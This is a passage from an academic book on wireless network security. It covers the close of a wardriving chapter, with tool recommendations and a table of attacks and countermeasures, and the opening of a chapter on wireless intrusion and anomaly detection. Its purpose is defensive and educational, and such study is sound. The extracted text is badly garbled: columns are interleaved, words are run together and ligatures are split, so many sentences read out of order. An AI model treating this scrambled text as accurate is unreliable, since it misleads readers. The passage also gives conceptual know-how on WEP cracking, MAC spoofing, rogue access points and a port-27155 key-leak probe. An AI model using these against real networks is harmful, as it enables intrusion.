to an AP that upon receiving a broadcast a WLAN will be always possible. WEP makes
user datagram protocol (UDP) packet on bruteforcingtobeuselessowing ( toitsaws)
fl but
,
port 27155 containing the string “getsearch” WPA-PSK can be only exploited by using a dic-
returned (in clear) the WEP keys, the MAC tionary attack. Hence, the strength of your WLAN
filteringdatabaseandtheadminpassword depends on the a
( password. Use a good policy to
big prize, indeed). create and distribute passwords and change them
3. Periodically download and try the tools. It is often. Do not forget that hundreds of people col-
useful, funny, and gives an idea of the activity laborate to produce dictionaries with most popular
of the underground community. passwords, also the most disparate ones (and also
in leet variant – l33t v4r1aNt).
Avoid Default Configurations
(Always)
tools
Itiswidelyknownthatdefaultconfigurationsare
most of the time fine for normal users,NetStumbler but not (www.netstumbler.com): NetStum-
particularly tweaked for security. For instance, bler is a program for the Windows™ operating
in the Wireless power section we discussed some system allowing to detect WLANs. It is a quite
possible risks arising when too much transmis- handy tool for locating WLANs but it has not all
sion power is employed. Besides, another threat thefeaturesandtheexibility fl oftheAircrack-ng
relies in default names for the SSID, which can suite.
be employed to uncloak a hidden network, even if Kismet (www.kismetwireless.net): Kismet al-
without special tools. For instance, it is well known lowsmonitoringandsniffingtrafficoveraWLAN.
that many Cisco AP use “tsunami” as default SSID, In addition, it can also be adopted as an intrusion
and that Linksys uses “linksys.” Nevertheless, it is detection system. Kismet is able to identify net-
possible to retrieve them by performing a simple works both in active and passive mode. Besides,
Web search (moreover it is possible to retrieve it also offers many other features, such as BSSID
SSID naming schemas for hotels, retailers, and uncloaking. Kismet supports many wireless cards
popular Internet cafès…). Lastly, a good sugges- and many OSs, as well as many CPUs (e.g., x86,
tion is to change also the default password of your ARM, PPC, and X-Scale); however, some features
gear, since a malicious attacker (that normally is are only available on the Linux-x86 version.
not a wardriver, but a vandal) can try to alter the KisMAC (http://KisMAC.de/): KisMAC is
APconfiguration. the counterpart of Kismet, but it runs natively on
MacOSX and it is easy to use, owing to its simple
browse the source and use the tools GUI.
Aircrack-ng (http://www.aircrack-ng.org):
Owing to the availability of the tools, it is a better Aircrack-ng is a comprehensive suite of tools,
idea to try to be a wardriver sometimes, in order to ranging from analyzers, sniffers, and cracking
testyourownset-up,aswellastheconfiguration tools. Sources and scripts are available, promoting
made by your users (e.g., students, colleagues, or aircrack-ng as one of the best tools and a starting

Wireless Wardriving
Table 3. Summary of wardriving threats and possible countermeasures
Attack
Security
- Skills Needed WLAN Affected Countermeasures
Risk
Detected Anomaly
None. Automatically done in
SSID uncloack ALL 1 None at this level.
several software
Forecasted in the standard.

None. Automatically done by
Active scan ALL 0 Check periodically MAC
interfaces’ drivers
addressesoftrafficows. fl
None, but proper software

Passive scan and a proper interface is ALL 2 Reduce the transmission power.
needed.
Avoid WEP. If WEP must be

in place (for legacy support)
change password often. Monitor
WEP crack Minimum If WEP Protected 10 traffictodetectpeaksand
activateMACfilteringat ( least).
Force users to adopt VPN and
disable DHCPs.
MAC-based policies must be

Medium. Kernel patches
MACspoofing ALL 8 adopted jointly with encryption
could be needed.
techniques.
Tools for performing packet

Packet injection Medium. If WEP Protected 5 injection can also monitor the
WLAN like IDS.
The attacker could be “serious.”

De-authenticationood
fl Medium For WPA 7 Change the WPA password to
avoid a dictionary attack.
When in presence of limited

transmitting power, the attacker
Unsolicitedtrafficin
Medium/High ALL 9 relies on high gain antennas,
indoor environments
thus could be a prepared
attacker.
It could be a “false positive”

Unrecognized High ALL 10 or the attacker could be able to
produce his/her own tools.
point for developing automated (e.g., cron-drived) comprehensive table. In addition, we will also
or tweaked wardriving tools. introduce some “security risks” in order to better
calibrate the needed countermeasures. Security
riskshavebeenquantifiedonarangevaryingfrom
suMMAry tAblE About 0 (none) to 10 (severe). However, the more security
wArdrIvIng AttAcks is employed in the WLAN, the better. But, being
wardriving tightly mixed with people habits and
In this section, we summarize many security threats urban culture, the exposures to risks may vary
deriving from wardrivers’ activity, by offering a according where the WLAN is placed. Table 3
contains the summary.

Wireless Wardriving
conclusIon kEy tErMs
In this chapter we introduced the concept of war- Active Mode: Active mode is an operative
driving, and practices related to cracking wireless mode where scanning is done via probe packets.
networks. As explained, cracking a WLAN is not As a consequence, the scanner does not remain
a complex task: then, for your security you should undetected.
rely on other techniques (e.g., RADIUS). In addi-
MAC Address Filtering: MAC address fil -
tion, by using examples, it is possible to produce
tering is a technique that allows/denies network
your own penetration tests, as well as exercises
accessesonlyforapredefinedMACaddress.
to show some real world attack to students and
engineers. MAC Spoofing:MACspoofingischangingthe
MAC of the L2 interface. Typically it is employed
toby-passMACaddressfiltering.
AcknowlEdgMEnt
Packet Injection: Packet injection is the activity
of inserting a packet in a network for some purpose.
The author wishes to thank Prof. Franco Davoli
For instance, when attacking a WEP-protected
for the technical suggestions and the thorough
network,tostimulatethetrafficproductiontog
review, and Eng. Sergio Bellisario for the techni-
more data to be analyzed.
cal review.
rfmon: rfmon is an operative mode of IEEE
802.11-based air interfaces, allowing to scan for
rEfErEncEs access points while remaining undetectable, since
the card does not send any probe packets.
Ferro, E., & Potortì, F. (2005, February). Bluetooth
Wardriving: Wardriving is the activity of “driv-
and Wi-Fi wireless protocols: A survey and a com-
ing around, looking for wireless networks.”
parison. IEEE Wireless Communications, 12-26.
Wired Equivalent Privacy (WEP): WEP is an
Newsham, T. (2003). Applying known techniques
encryptionmechanismwithmanysecurityaws. fl
to WEP keys. Retrieved December 12, 2006, from
Recognized as a real security issue, it has been
http://www.lava.net/~newsham/wlan/WEP_pass-
replaced by wireless protected access (WPA).
word_cracker.pdf
Pollard, D. (2002). Write here, Right now. Retrieved
December 12, 2006, from http://news.bbc.co.uk/1/ EndnotEs
hi/in_depth/sci_tech/2000/dot_life/2070176.stm
Schneier, B. (1996). Applied cryptography: Proto- 1
However, if raw frames are supported by the
cols, algorithms, and source code (2nd ed.). John internal chipset, you can always build your
Wiley & Sons. own tools and enabling drivers by investigat-
Shipley, P. M. (2000). Peter M. Shipley personal ing the data-sheets.
homepage. Retrieved December 12, 2006, from
2
ManyOSesorfirmwarecleartheARPcache
http://www.dis.org/shipley/ upon disconnection. Then, it could be useful
to use a more “aggressive” strategy, as sug-
gested in aircrack documentation.

Chapter VI
Intrusion and Anomaly
Detection in Wireless Networks
Amel Meddeb Makhlouf
University of the 7th of November at Carthage, Tunisia
Noureddine Boudriga
AbstrAct
The broadcast nature of wireless networks and the mobility features created new kinds of intrusions and
anomaliestakingprofitofwirelessvulnerabilities.Becauseoftheradiolinksandth
features of wireless networks, wireless intrusions are more complex because they add to the intrusions
developed for wired networks, a large spectrum of complex attacks targeting wireless environment. These
intrusions include rogue or unauthorized accesspoint(AP)AP , MACspoofing,andwirelessdenialof
service and require adding new techniques and mechanisms to those approaches detecting intrusions
targeting wired networks. To face this challenge, some researchers focused on extending the deployed
approaches for wired networks while others worked to develop techniques suitable for detecting wireless
intrusions. The efforts have mainly addressed: (1) the development of theories to allow reasoning about
detection,wirelesscooperation,andresponsetoincidents;andthe (2) developmentofwir
and anomaly detection systems that incorporate wireless detection, preventive mechanisms and tolerance
functions. This chapter aims at discussing the major theories, models, and mechanisms developed for
the protection of wireless networks/systems against threats, intrusions, and anomalous behaviors. The
objectives of this chapter are to: (1) discuss security problems in a wireless environme
thecurrentresearchactivities;study (3) theimportantresultsalreadydevelopedbyr
discuss the validation methods proposed for the protection of wireless networks against attacks.
IntroductIon wide open medium. Along with improved encryp-

tion schemes, a new solution helping the problem
Wireless has opened a new and exciting area for resolution is the wireless intrusion detection system
research. Its technology is advancing and chang- (WIDS). It is a network component aiming at pro-
ing every day. However, the biggest concern with tecting the network by detecting wireless attacks,
wireless has been security. For some period of which target wireless networks having specific
time, wireless has seen very limited security on the features and characteristics. Wireless intrusions
Intrusion and Anomaly Detection in Wireless Networks
canbelongtotwocategoriesofattacks. tion.The
Thefirst
seventh section discusses mechanisms
category targets the fixed part of the wireless
of prevention and tolerance provided to enhance
network,suchasMACspoofing,IPspoofing,and the wireless intrusion detection. Finally, the last
denial of service (DoS); and the second category section concludes the chapter.
of these attacks targets the radio part of the wire-
less network, such as the access point (AP) rogue,
noiseooding,
fl andwirelessnetworksniffing. The
vulnErAbIlItIEs, tHrEAts, And
latter attacks are more complex because they are AttAcks In wIrElEss nEtworks
hard to detect and to trace-back.
To detect such complex attacks, the WIDS To present vulnerabilities, threats, and attacks
deploys approaches and techniques provided targeting wireless networks, we have to discuss
by intrusion detection systems (IDS) protecting firstthesecurityrequirementsofwirelesssyste
wired networks. Among these approaches, one including those concerning security policy. This
can find the signature-based anomaly andbased section presents the concepts of wireless intrusion,
approaches.Thefirstapproachconsists - inmatch
anomaly, and attack scenario in wireless networks,
ing user’s patterns with stored attack’s patterns (or in order to highlight intrusion and anomaly detec-
signatures). The second approach aims at detect- tion requirements. In particular, it discusses some
ing any deviation of the “normal” behavior of the attacksandattackclassificationthatmakesec
network entities. The deployment of the afore- in wireless systems very special.
mentioned approaches in a wireless environment
requiressomemodifications.Thesignature- securitybasedrequirements in wireless
approach in wireless networks may require the
Environments
use of a knowledge base containing the wireless
attack signatures while an anomaly based ap-
Securing a communication channel should satisfy
proachrequiresthedefinitionofprofilesspecificto
at least the following set of requirements: integ-
wireless entities (mobile users and AP). Recently,
rity, confidentiality, and availability. Moreover
efforts have focused on wireless intrusion detec-
wireless communications require authentication
tiontoincreasetheefficiencyofWIDS.Basedon
of the sender or/and the receiver and techniques
these efforts, models and architectures have been
that guarantee non-repudiation. In the following,
discussed in several research works.
we discuss technical security and security policy
The objective of this chapter is to discuss the
requirements which help reducing vulnerabilities
major research developments in wireless intru-
and attack damages.
sion detection techniques, models, and proposed
Because of their technical architecture, mobile
architectures. Mainly, the chapter will: (1) discuss
communications are targets for a large set of threats
security problems in wireless environments;
and attacks that occur in wired networks, such as
(2) present current research activities; (3) study
identity spoofing, authorization violations, da
important results already developed; and (4)
loss, modified and falsified data units, - and repu
discuss validation methods proposed for WIDS.
diation of communication processes. Additionally,
The remaining part is organized as follows: The
new security requirements and additional measures
next section discusses vulnerabilities, threats, and
for wireless networks have to be added to the se-
attacks in wireless networks. The third section
curity requirements of wired networks (Schäfer,
presents wireless intrusion and anomaly detection
2003). Vulnerabilities, threats, and attacks, existing
approaches. The fourth section introduces models
in wireless networks represent a greater potential
proposedfordetectingwirelessintrusions.Thefifth
risk for wireless networks. One among technical
section presents WIDS architectures, proposed by
requirements is the enforcement of security of
researches papers. The sixth section presents the
the wireless links, because of the ease of gaining
wireless distributed schemes for intrusion detec-
directphysicalaccesses.Moreover,newdifficulties

can arise in providing wireless security services. given perimeter. Consequently, the AP’s
For example, the authentication of a mobile de- placement and signal strength have to be
vicehastobeverifiedbyor ( for)allAPor ( base
adapted to make sure that the transmitting
station [BS]) under which the mobile changes its coverage is just enough to cover the correct
localization. Because of the handover, respective area.
entities cannot be determined in advance, so the key • Physical security of an authorized AP:
management process is more complicated. Also, Because most APs are mounted by default,
the difference with wired networks, in terms of their placement is critical. An AP has to be
confidentialityofmobiledevicelocation,correctly reveals a in order to avoid accidental
placed
number of threats against mobile communications. damage, such as direct access to the physical
This appears because of the following conflnetwork ict: cable. To protect physically the ac-
In one hand, each mobile should be reachable for cess to the AP, many solutions were proposed;
incoming communication requests while, on the but all of them require a mandatory policy.
other hand, any network entity should be able to • Rogue AP: This vulnerability is a sort of man-
get the current location of a mobile device in the in-the middle attack, where an attacker can
network (Schäfer, 2003). place an unauthorized (or rogue) AP on the
networkandconfigureittolooklegitimateto
wireless vulnerabilities and threats gain access to wireless user’s sensitive data.
This can be done because user’s devices need
A vulnerability is a weakness (or fault) in the to be connected to the strongest available AP
communication medium or a protocol that al- signal.
lows compromising the security of the network • The easy installation and use of an AP: In
component. Most of the existing vulnerabilities in order to use the advantages of internal net-
the wireless medium are caused by the medium. works, employees can introduce an unauthor-
Because transmissions are broadcast, they are ized wireless network. The easy installation
easily available to anyone who has the appropri- andconfigurationoftheAPmakethisfeasible
ate equipment. Particular threats of the wireless for legitimate or illegitimate users.
communication are device theft, malicious hacker, • The AP configuration: If the AP is poorly
malicious code, theft of service, and espionage configuredorunauthorized,then - itcanpro
(Boncella, 2006). There are numerous of wire- vide an open door to hackers. This is caused
less vulnerabilities and threats that are studied in by using a default configuration - that anni
the literature, for the purpose of detecting attacks hilates the security controls and encryption
exploiting them. In the following, we distinguish mechanisms.
two categories of vulnerabilities and threats: those • Protocol weaknesses and capacity limits
existing in a LAN-like wireless networks (WLAN) on authorized AP’s: These limitations can
and those existing in cellular-like wireless networks cause DoS from hackers using unauthorized
(Hutchison, 2004). AP’s when they can ood fl authorized AP
with traffic forcing them to reboot or deny
WLAN Vulnerabilities and Threats accesses.
The following are typical vulnerabilities existing in Some of the attacks, exploiting the aforemen-
the main component of WLAN, which is the AP. tioned vulnerabilities are discussed in the following
section of this chapter.
• Signal range of an authorized AP: This
vulnerability is about the possibility of the
extension of AP signal strength beyond a
0
Cellular System Vulnerabilities and Illicit Use

Threats
Illicit use of a wireless network may involve an
This subsection presents cellular system vulner- attacker connecting to the Internet or to the cor-
abilities and threats that are categorized as follows porate network that lives behind the AP. Illicit use
(Nichols & Lekkas, 2002): is a passive attack that does not cause damage to
the physical network. It includes following attacks
• Service interruption: The increased capacity (Mateli, 2006):
provided by the high-speed technology has
resulted in fewer cable routes necessary to • Wireless network sniffing: When wireless
meet capacity requirements. Consequently, packets traverse the air, attackers equipped
this has decreased the number of switches. with appropriate devices and software can
The lack of overall diversity in cabling and capture them. Sniffing attack methods - in
switching has increased the vulnerability of clude:
telecommunication infrastructures. This can
cause DoS of an entire zone. ° Passive scanning: This attack aims
• Natural threats: Natural threats comprise at listening to each channel. It can be
the category of repeated threats caused by done without sending information. For
climatic, geological, or seismic events. Severe example, some radio frequency monitors
damage resulting from natural disaster can can allow copying frames on a chan-
cause long-term damage to the telecommu- nel.
nication infrastructures. ° Service set identifier (SSID) detection:
• Handset vulnerabilities: Unlike computer This consists in retrieving SSID by
systems, handsets are limited regarding the scanning frames of the following types:
security features. Because wireless messages beacon, probe requests, probe responses,
travel through the air by passing conven- association requests, and re-association
tional wired network for transmission to the requests.
receiver, messages may need to be changed ° MAC addresses collecting: To con-
to another protocol (e.g., at the gateway, the struct spoofed frames, the attacker has
wireless transport layer security message to collect legitimate MAC addresses,
has to be changed to Secure Socket Layer). which can be used for accessing AP
This operation presents vulnerability because filteringoutframeswithnonregistered
anyone can access the network at this mo- MAC addresses.
ment. Moreover, the use of encryption can
add vulnerabilities, which can make confu-
sion between mobile phones, since the node To capture wireless packets, specific - equip
does not know its encrypted true location. ments should be used by the attackers, depending
on the targeted wireless network interface card
wireless Attacks (Low, 2005).
Detecting a large set of attacks by a WIDS requires • Probing and network discovery: This attack
studying and developing the attacker’s methods aims to identify various wireless targets. It
and strategies. We discuss in this subsection the uses two forms of probing: active and passive.
typical attacks and malicious events that can be Active probing involves the attacker actively
detected by a WIDS (Hiltunen, 2004; Vladimirov, sendingproberequestswithnoidentificatio
Gavrilenko, & Mikhailovsky, 2004). usingtheSSIDconfiguredinordertosolicit
a probe response with SSID information and

other information from any active AP. When down to create a “difficult to connect” scenario.
an attacker uses passive probing, he is listen- Second, the attacker must setup an alternate rogue
ing on all channels for all wireless packets, AP with the same credentials as the original for
thus the detection capability is not limited purposes of allowing the client to connect to it. Two
by the transmission power (Low, 2005). main forms of the MITM exist: the eavesdropping
• Inspection: The attacker can inspect network and manipulation. Eavesdropping can be done by
information using tools like Kismet and receiving radio waves on the wireless network,
Airodump (Low, 2005). He could identify which may require sensitive antenna. Manipula-
MAC addresses, IP address ranges, and tion requires not only having the ability to receive
gateways. the victim’s data but then be able to retransmit the
data after changing it.
Wireless Spoofing
Denial of Service Attacks
Spoofing purpose is to modify identification - pa
rameters in data packets. New values of selected DoS attacks can target different network layers as
parameters can be collected by sniffing. Typical
explained in the following:
spoofingattacksinclude:
• Application layer: DoS occurs when a large
• MAC address spoofing:MACspoofingaims
amount of legitimate requests are sent. It
at changing the attacker’s MAC address by
aims to prevent other users from accessing
the legitimate MAC address. This attack is
the service by forcing the server to respond
made easy to launch because some client-side
to a large number of request’s transactions.
software allows the user to view their MAC
• Transport layer: DoS is performed when
addresses.
many connection requests are sent. It targets
• IP spoofing:IPspoofingattemptstochange
the operating system of the victim’s computer.
source or destination IP addresses by talking
Thetypicalattackinthiscase-isaSYNood fl
directly with the network device. IP spoof-
ing.
ing is used by many attacks. For example,
• Network layer: DoS succeeds, if the network
an attacker can spoof the IP address of host
allows to associate clients. In this case, an
A by sending a spoofed packet to host B an-
attacker can ood fl the network with traffic
nouncing the window size equal to 0; though,
to deny access to other devices. This attack
it originated from B (Mateli, 2006).
could consist of the following tasks:
• Frame spoofing: The attacker injects frames
 The malicious node participates in a
havingthespecification
1 2. 0 8 withspoofed
route but simply drops several data
containing. Due to the lack of authentication,
packets. This causes the deterioration of
spoofed frames cannot be detected.
the connection (Gupta, Krishnamurthy,
& Faloutsos, 2002).
Man in the Middle Attacks  The malicious node transmits falsified
route updates or replays stale updates.
This attack attempts to insert the attacker in the These might cause route failures thereby
middle (man in the middle [MITM]) of a communi- deteriorating performance.
cation for purposes of intercepting client’s data and  The malicious node reduces the time-
modifying them before discarding them or sending to-live (TTL) field in the IP header so
them out to the real destination. To perform this that packets never reach destinations.
attack, two steps have to be accomplished. First, the • Data link layer: DoS targeting the link layer
legitimate AP serving the client must be brought can be performed as follows:

 Since we assume that there is a single on using in the same system the two approaches
channel that is reused, keeping the simultaneously. To be efficient, intrusion - detec
channel busy in the node leads to a DoS tion approaches has to be run online and in real
attack at that node. time. Otherwise, the use of intrusion detection
 By using a particular node to continually technique is useful for audit or postmortem digital
relay spurious data, the battery life of investigation and it will not prevent an attack on
that node may be drained. An end-to-end time. Real-time intrusion detection has to be able
authentication may prevent these attacks to collect data from the network in order to store,
from being launched. analyze and correlate them, which can decrease
• Physical layer: This kind of DoS can be network performance (Hutchison, 2004).
executed by emitting a very strong RF inter-
ference on the operating channel. This will wireless detection Approaches
cause interference to all wireless networks
that are operating at or near that channel. The main objective of wireless detection is to pro-
tect the wireless network by detecting any deviation
with respect to the security policy. This can be done
wIrElEss IntrusIon And by monitoring the active components of the wire-
AnoMAly dEtEctIon less network, such as the APs (Hutchison, 2004).
Generally, the WIDS is designed to monitor and
This section discusses the major security solutions report on network activities between communicat-
provided for wireless networks. In particular, the ing devices. To do this, the WIDS has to capture
cases of WLAN and ad hoc networks will be ad- anddecodewirelessnetworktraffic.Whilesome
dressed. The discussed methods include the radio WIDSs can only capture and store wireless traf-
frequencyfingerprinting,cluster-based fic,detection,
otherWIDSscananalyzetrafficandgenerate
mobile devices monitoring, and mobile profile reports. Other WIDSs are able to analyze signal
construction. fingerprints,whichcanbeusefulindetectingand
tracking rogue AP attack. As it is done for wired
basic techniques for detection networks,thefollowingclassificationsofIDSscan
be distinguished according to several dimensions:
Wireless intrusion detection protects wireless the approach (signature based/anomaly based); the
networks against attacks, by monitoring monitoredtraffic
system (network-based/host-based); and
and generating alerts. Two ways of detection are the way of response (active/passive).
distinguished: signature based and anomaly based.
Thefirstcategoryaimsatdetectingknown Mobile Profiles Construction
attacks
by looking for their signatures. The main disad-
vantage of such approaches is that they detect only The main objectives when using the anomaly
known attacks. The anomaly based approaches are basedapproacharetodefineusermobilityprofiles
not often implemented, mostly because of the high (UMPs) and design an appropriate system that
amount of false alarms that have to be managed permits the detection of any deviation with respect
loosing a large amount of time. Anomaly based to UMP. The intrusion detection process begins
detection develops a baseline of the way of con- with the data collection processing. Once the user
sideringnormaltraffic.Whenanabnormal traffic
location coordinates (LCs) are determined, a high-
is detected, an alert is generated. The advantage level mapping (HLM) is applied. The objective
of such approach is that it can capture unknown of the HLM is to decrease the granularity of the
attacks. data in order to accommodate minor deviations or
To take from the advantages of the previous intra-user variability between successive location
two approaches, the hybrid approach consists broadcasts. LCs features are extracted from each

broadcast during feature extraction. A set of these client within this list trying to access the
chronologically ordered LCs are subsequently network would be automatically denied and
concatenatedtodefineamobilitysequence (Hall,
an alert can be sent off.
Barbeau, & Kranakis, 2005). This process contin- • All wireless clients with an “illegal” MAC
ues until the creation of the mobility sequences. address (MAC address ranges, which have
Thetrainingpatternsfromthefirstfourof notthe
beensix
allocated) are automatically denied
data set partitions are stored in the UMP, along with access and an alert is sent off.
otheruser-relatedinformation.During - • the classifi
A wireless client that just sends out probe re-
cation phase, a set of user mobility sequences are quests or special distinguishable data packets
observed and compared to the training patterns in after the initial probe request has not been
theuser’sprofiletoevaluatethesimilarity measure
authenticated canbeagged
fl outaspotential
to profileSMP) ( parameter. If the average of the network discovery attack.
SMPvalueexceedspredefinedthresholds, • then the
Usually, when impersonation attacks are on-
mobility sequences are considered abnormal and going, the attacker will take on the MAC/IP
an alert is generated (Hall et al., 2005). address of the victim, but it will not be able
The following parameters are defined for tothe
continue with the SN used previously by
mobility profiles: ) 1 ( the identifier representing the victim. Thus, by monitoring the SN in
the user identification; ) 2 ( the training patterns these packets, potential impersonators could
characterizing the user mobility behavior; (3) the beidentified.
window size representing the mobility sequence
numbers (SN). Radio Frequency Fingerprinting (RFF)
Monitoring Wireless Devices The RFF is defined as the process identifying a

cellular phone by the unique “fingerprint” that
Using a signature-based approach, the IDS bases characterizes its signal transmission. It is used to
its processing on the recognition of intrusion’s prevent cloning fraud, because a cloned phone will
patterns from the traffic outputs. This notrequires
have the same fingerprint as the legal phone
monitoring several parameters of the AP outputs with the same electronic identification number
and the wireless client. Monitoring APs is about This approach aims to enhance the anomaly based
monitoring their respective SSID, MAC address, wireless intrusion detection by associating a MAC
and channel information. This requires listening address with the corresponding transceiver pro-
wireless frames, such as beacons, probe response, file.ThearchitectureofthecorrespondingIDSis
and authentication/association frames at the AP shown by Figure 1, where the main objective is to
outputsandcomparingthemtothe - predefined
classify an atobserved transceiver print as normal
tack signatures. For example, in the case of MITM (belongs to the transceiver of a device with a given
attack, the monitoring process would detect that MAC address) or anomalous (belongs to another
there is a sudden introduction of an AP on another transceiver) (Barbeau, Hall, & Kranakis, 2006;
channel previously not present. Through the SSID, Hall et al., 2005).
MAC address might be spoofed by the attacker in AsillustratedinFigurethe ,1 informationow
fl
the process of setting up the rouge AP. begins by converting the analog signal to a digital
Because authorized clients cannot be listed, the signal. This is done by the converter component.
information that may help detecting an attack can- Second, the transient extractor extracts the transient
not be totally available; nevertheless, the following portion from the digital signal. Then, the amplitude,
aspects can be monitored (Low, 2005): phase,andfrequencydefiningthetransceiverprin
are extracted by the feature extraction component.
• The “blacklist” of wireless clients can be These features are compared to the transceiver
checked against all connecting clients. Any profiles existing in the IDS. This operation is

Figure 1. The enhanced architecture of WIDS
Analog/Digital Feature Classifier Bayesian

conversion extractor Filter
Digital signals Transceiver profiles
Feature
extractor
performedbytheclassifiercomponent.Todecide amplitude, phase and frequency, amplitude

about the status of the transceiverprint, the Bayesian variance, and deviations of normalized in-
filter is applied. This processrequiresextracting phase data and normalized quadrate data.
predefinedtransceiver’sprofiles,whichisdetailed
in the following sub-section. cluster-based detection in Ad Hoc
networks
• Feature extractor: In this step, amplitude
and phase components are obtained using Due to the distributed nature of wireless networks,
respectively, equations (1) and (2). especially ad hoc networks are vulnerable to at-
tacks. In this case, intrusion detection provides
a (t ) = i (t ) + q (t )
2 2 (1) audit and monitoring capabilities that offer local
security to a node and helps to perceive specific
q (t ) trust levels of other nodes (Ahmed, Samad, &
(t ) = tan −1[ ] (2)
i (t ) Mahmood, 2006; Samad, Ahmed, & Mahmood,
2005). Clustering protocols can be taken as an ad-
Frequency extraction is done by applying ditional advantage in these processing constrained
the discrete wavelet transform (DWT), for networks to collaboratively detect intrusions with
example. less power usage and minimal overhead. Because
• Classifier: To classify a signal as anomalous, of their relation with routes, existing clustering
the probability of match has to be determined protocols are not suitable for intrusion detection.
foreachtransceiverprofile.Therefore, - The route establishment and route renewal and route
asta
tistical classifier using neural networksclusters.
renewal affect can Consequently, processing
be used, where the set of extracted features and traffic overhead increase, due to instabili
represent a vector and the outputs are a set of clusters. Ad hoc networks present battery and
of matching probabilities. power constraint. Therefore, the monitoring node
• Bayesian filter: To decide whether match- should be available to detect and respond against
ing probabilities exceed threshold values, intrusions in time. This can be achieved only if
a Bayesian filter is applied because clusters are stable for a long time period. If clusters
of the
noise and interference, which are special are regularly changed due to routes, the intrusion
characteristics of wireless environment. The detection willnotbeefficient.Therefore, - ageneral
Bayesianfilterhastoestimatethestateofa ized clustering algorithm, detailed in Ahmed et al.
system from noisy observations. (2006) has been discussed. It is also useful to detect
• Feature selection/profile definition: Before collaborative intrusions (Samad et al., 2005).
applyingthedetectionprocess,thedefinition
of transceiver’s profiles has to be Cluster
made. ToFormation
do so, features that have low intra-transceiver
variability and high inter-transceiver vari- Clusters are formed to divide the network into
ability are selected. Examples of selected manageable entities for efficient monitoring an
features include: deviations of normalized low processing. Clustering schemes result in a

special type of node, called the cluster head (CH) performs its own audit and analysis; however, it
to monitor traffic within its cluster. It not
performs only
partial analysis immediately after becom-
manages its own cluster, but also communicates ing a CH or MN. Intrusion detection techniques
with other clusters for cooperative detection can be anomaly based or signature based.
and response. It maintains information of every The host-based IDS (HIDS) observes traffic
member node (MN) and neighbor clusters. The at individual hosts, while network-based IDS
cluster management responsibility is rotated (NIDS) are often located at various points along
among the cluster members for load balancing and the network. Since centralized audit points are not
fault tolerance and must be fair and secure. This available in ad hoc networks, NIDSs cannot be used.
can be achieved by conducting regular elections Alternatively, if every host starts monitoring intru-
(Samad et al., 2005). Every node in the cluster sions individually such as in HIDS, lot of memory
must participate in the election process by casting and processing will be involved. Therefore, a dis-
their vote showing their willingness to become the tributed approach is used to perform monitoring,
CH. The node showing the highest willingness, by where both CH and MN collect audit data.
proving the set of criteria, becomes the CH until Aow
fl modelofintrusiondetectionarchitecture
the next timeout period. of cluster-based intrusion detection (CBID) is illus-
trated by Figure 2, which consists of four modules.
Intrusion Detection Architecture Information collected during the training phase in
the logging module is transferred to the intrusion
Because ad hoc networks lack in centralized audit information module to perceive a threshold value
points, it is necessary to use the IDS in a distributed for the normal traffic. If it is the case, an alert is
manner. This also helps reducing computation generated by the intrusion response module.
and memory overhead on nodes. The proposed
clustering algorithm in Samad et al. (2005) can • Logging: The CH captures and logs all the
be related to the intrusion detection process as traffic transferred through its radio range
partialanalysisoftheincomingtrafficisIt keeps
done at the necessary fields and the data
the CH and the rest of the analysis is done at the related to trafficsuchas number of packets
destination node. Traffic analysis at thesent, CH andreceived, forwarded, or dropped in a
packet analysis at the MN is helpful in reducing database.Thetrafficcaneitherbedatatraffic
processing at each node. If a malicious activity orcontroltraffic.Theselogscanbehelpful
is found by the CH, it informs its members and for the detection of many attacks, such as
the neighboring clusters to take a set of actions. blackhole, wormhole, sleep deprivation,
It is the responsibility of CH to obtain help from maliciousooding,fl packetdropping,andso
and/or inform the MNs and neighboring clusters forth.
for a particular intrusion. Undecided node (UD) • Intrusion information: If signature-based
detection is used, every node must maintain
Figure 2. Intrusion detection process

a database that contains all the intrusion MANET nodes have WAN connectivity,
signatures. For anomaly based detection, the node can initiate download requests to
the anomalous behaviors must also be well obtain the latest model from the server; and
defined. (2) without WAN connectivity, MANET
• Intrusion detection: By this module, the nodes can be initialized before deployment,
node detects intrusions by analyzing and where the default model is used.
comparingthetrafficpatternswith • the normal
Another model consists in deploying a more
behavior. If anomaly is found, the CH gener- powerful MANET node with sufficient
ates an alarm and increases the monitoring processing and battery power to perform
levelandanalyzesthetrafficinmoredetail anomaly training. The node would listen
tofindouttheattacktypeandidentity ofthe
promiscuously to all visible traffics on the
attacker. MANET, generate anomalies, and distribute
• Intrusion response: To inform about de- them to the peers.
tected intrusions, nodes generate alerts. They • Use a pre-computed anomaly model. This
also can provide responses to react against scenario is worst case, but can be practical
them. in situations where the MANET’s behavior is
well-definedandfollowsastandardprotocol
definition.
dEtEctIon ModEls
Model Aggregation/Profiling
To enhance IDS efficiency, theories and models
have been developed to cope with intrusion cor- The aggregation model was previously used in
relation; action tracking and packet marking; digital MANETs for alerts demonstrated that, by integrat-
investigation using evidences based on alerts; and ing security-related information at the protocol
attack reconstruction in wireless environments. level from a wider area, the false positive rate
Theevidenceisdefinedasasetofrelevant - informa
and the detection rate can be improved (Cretu et
tion about the network state (Aime, Calandriello, al., 2006).
& Lioy, 2006). In addition, model aggregation enables peers
to determine whether or not to communicate with
Intrusion and Anomaly detection a particular node n1. If the peers’ models are very
Model Exchange similar to those used by n1, it suggests that the
node is performing similar tasks. A node with a
This section discusses the anomaly model used dissimilar model is considered as suspicious and
in mobile ad hoc networks (MANET). It is based has a malicious content. For example, a node send-
onthemodeldistributionandmodelprofiling ing out wormand
packets will generate a substantially
aggregation. different content distribution. This can be done via
comparison (Cretu et al., 2006).
Model Distribution
Anomaly based detection Models
Due to the lack of battery power or computation
ability, MANET’s model is required. Depending on In this section, we discuss how to build anomaly
the node location performing intrusion detection, detection models for wireless networks. Detection
the following distribution models can be adopted based on different kinds of activities may differ in
(Cretu, Parekh, Wang, & Stolfo, 2006): the format and the amount of available audit data
as well as the modeling algorithms. However, we
• In the case of generating anomalies, training admit that the principle behind the approaches will
can be done by MANET nodes: (1) if the be the same. Therefore, we discuss in this section

only one of these approaches, which is based on a (PCH), and the percentage of newly added routes
routing protocol (Zhang, Lee, & Huang, 2003): (Zhang et al., 2003). These measurements are used
because of the dynamic nature of mobile networks.
Building an Anomaly Detection Model Thenormalprofileonthetracedataspecifiesthe
correlation of physical movements of the node and
This method uses information-theoretic measures, the changes in the routing table.
namely, entropy and conditional entropy, to de- ClassificationrulesforPCRandPCHdescribe
scribenormalinformationows fl anduse - classifica
normal conditions of the routing table. These rules
tion algorithms to build anomaly detection models. can be used as normal profiles. Checking - an ob
Whenconstructingaclassifier,featureswithhigh served trace data record with the profile invol
